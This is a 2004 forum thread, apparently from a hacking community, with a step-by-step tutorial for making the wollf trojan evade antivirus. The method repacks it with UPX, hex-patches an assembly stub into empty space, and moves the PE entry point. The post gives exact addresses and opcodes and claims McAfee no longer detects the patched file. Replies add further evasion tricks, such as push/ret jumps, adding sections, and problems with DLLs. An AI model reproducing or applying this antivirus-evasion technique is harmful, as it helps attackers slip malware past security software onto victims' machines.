Universal Method Of Tricking Antivirus

ComSec

Jan 11 2004, 01:13 PM

article submitted by Progressor

Universal method of tricking antivirus.

I won't explain every command, you'll have to learn Assembler fo this.

Tools:
Hex redactor - I used Hiew 6.75 (http://webhost.kemtel.ru/~sen)
Fearless PE Tool 0.1 - http://areyoufearless.com/modules.php?op=m...Downloads&file=

index&req=getit&lid=125
UPX packer - http://upx.sourceforge.net/
Brain - must have it, you can't download it.

I took for example well known trojan wollf v1.6 (www.xfocus.org)

Now, let start:

Wollf is already packed by an old version of UPX, so we unpack and pack it again by newest version

of UPX.
Now we are using PE tool and we will find this info about our trojan:

Entry Point: 00024FD0h
Image Base: 00400000h

Let us open wollf.exe in Hiew, go to disassemble mode (F4/Decode), go to address Entry Point +

Image Base = 00424FD0h, for doing this press Goto (F5) and type ".00424FD0" (you need this dot

before address, because it is a virtual address). Now we see something like this:

CODE

.00424FD0: 60 pushad
.00424FD1: BE00804100 mov esi,000418000 -----^ (1)
.00424FD6: 8DBE0090FEFF lea edi,[esi][0FFFE9000]
.00424FDC: 57 push edi
.00424FDD: 83CDFF or ebp,-001;"O"
.00424FE0: EB10 jmps .000424FF2 -----v (2)

Now we have to find place for our patch, scroll down a couple of pages and you'll see a lot of

place with zeros. I choose address 00425147. For edit press F3/F2.
OEP = Entry Point + Image Base

CODE

.00425147: 68D04F4200 push 000424FD0 <--- push OEP
.0042514C: 50 push eax
.0042514D: 9C pushfd <---for tricking AVP
.0042514E: 60 pushad <---for tricking AVP
.0042514F: E800000000 call .000425154 <----- call for Ret 28h

add another command: Ret 28h you will see
.00425154: C22800 retn 00028 ;" ("

for Save press F9

and we add another 2 commands
INC ECX
LOOP patch address

.00425161: 41 inc ecx <------- our new Entry Point
.00425162: E2E3 loop .000425147

Finally we have our patch:

CODE

.0042513F: 0000 add [eax],al
.00425141: 0000 add [eax],al
.00425143: 0000 add [eax],al
.00425145: 0000 add [eax],al
.00425147: 68D04F4200 push 000424FD0 -----^ (1)
.0042514C: 50 push eax
.0042514D: 9C pushfd
.0042514E: 60 pushad
.0042514F: E800000000 call .000425154 -----v (2)
.00425154: C22800 retn 00028;" ("
.00425157: 0000 add [eax],al
.00425159: 0000 add [eax],al
.0042515B: 0000 add [eax],al
.0042515D: 0000 add [eax],al
.0042515F: 0000 add [eax],al
.00425161: 41 inc ecx <------- our new Entry Point
.00425162: E2E3 loop .000425147 -----^ (3)
.00425164: 0000 add [eax],al
.00425166: 0000 add [eax],al
.00425168: 0000 add [eax],al

And last thing we should do, we open the file in PE tool and change Entry Point:
Entry Point = Offset - Image Base = 00425161 - 00400000 = 0025161h

Now, if you can unpack the file with UPX, then I suppose you did it right. (don't forget to backup

your file or you'll have to make this patch again.)

I tested patched file on McAfee Virusscan Pro 7.03, it doesn't detect our trojan.
Enjoy.

Faceless Master

Jan 11 2004, 04:45 PM

Nice..
Need to test for KAV!
And one thing more that the link to Fearless PE tool is broken
It gave,

QUOTE

404 Error Message:
Page Not Found on http://areyoufearless.com
--------------------------------------------------------------------------------
We're sorry. The page you requested, http://areyoufearless.com, doesn't exist on " Fearless "

Regards
~Faceless Master

dmg

Jan 12 2004, 12:14 PM

Thanx for sharing this knowledge. Very interesting reading. I don't know any assambly but always eager to learn

I encounter a problem while trying to reproduce the above:

call .000425154
loop .000425147

In both cases hiew gives me an error "Invalid Operand". I CAN add the addresses without a dot but I guess that wont work

Any idea what I'm doing wrong?

TIA

BillyJawz

Jan 12 2004, 02:13 PM

Simple question: why don't u simply use a debugger like IDA or OllyDbg instead of an hex editor with asm reading feature + PE editor?

Nice tut thks.

BillyJawz

Jan 12 2004, 02:20 PM

Response: those tools dont allow to change PE entry point..

Sorry to ask

I usually trick antivirus software by packing (force method if already packed) with exe32pack (/F option if already packed)...lazy method.

matrixz

Jan 12 2004, 03:03 PM

u can get Fearless PE Tool 0.1 faceless master from this link
http://areyoufearless.com/modules.php?op=m...download&sid=10

eXeco

Feb 5 2004, 02:14 PM

If you use the free space between code size and virtual size to patch your server dont forget to update the VA in the PEheader.

If you are out of space you could add a new section and hook your EIP with a long jump (need Sice to avoid complex VA/RVA calculation).

/EDIT:

If you only want to hook the EIP you could use the simple command:

#newEIP : move eax, oldEIP
#nextofft: jmp eax

niko

Feb 5 2004, 08:53 PM

JMPS are too unpredictable, I.E., you have to always calcuate offsets and crap.

The best universal way to jump anywhere you want is to do this:

PUSH <address> (make sure this is the virtual address)
RET

With this you can go anywhere without pain in the butt calcuations.

-niko

depaos

Feb 6 2004, 02:05 PM

thanks for this tip
i ask a noob question because i'm not really understanding what this code do but in some exe i test it it ran fine

only one thing i try to put it on a dll. the patch trick the AV for the dll but the dll don't run correctly. it's normal ? or need an otther code for a dll file
thank for your answer

niko

Feb 6 2004, 05:36 PM

The PUSH RET trick is kinda not too good for DLL's - DLL imagebase changes depending on the system it's on. In other words, its code is relocated at run time to different addresses, hence this trick wouldn't work. Its mainly for EXE's - it wil always work right in an EXE, but not for DLL.

In DLL's you will still have to do some offset calcs no matter what.

-niko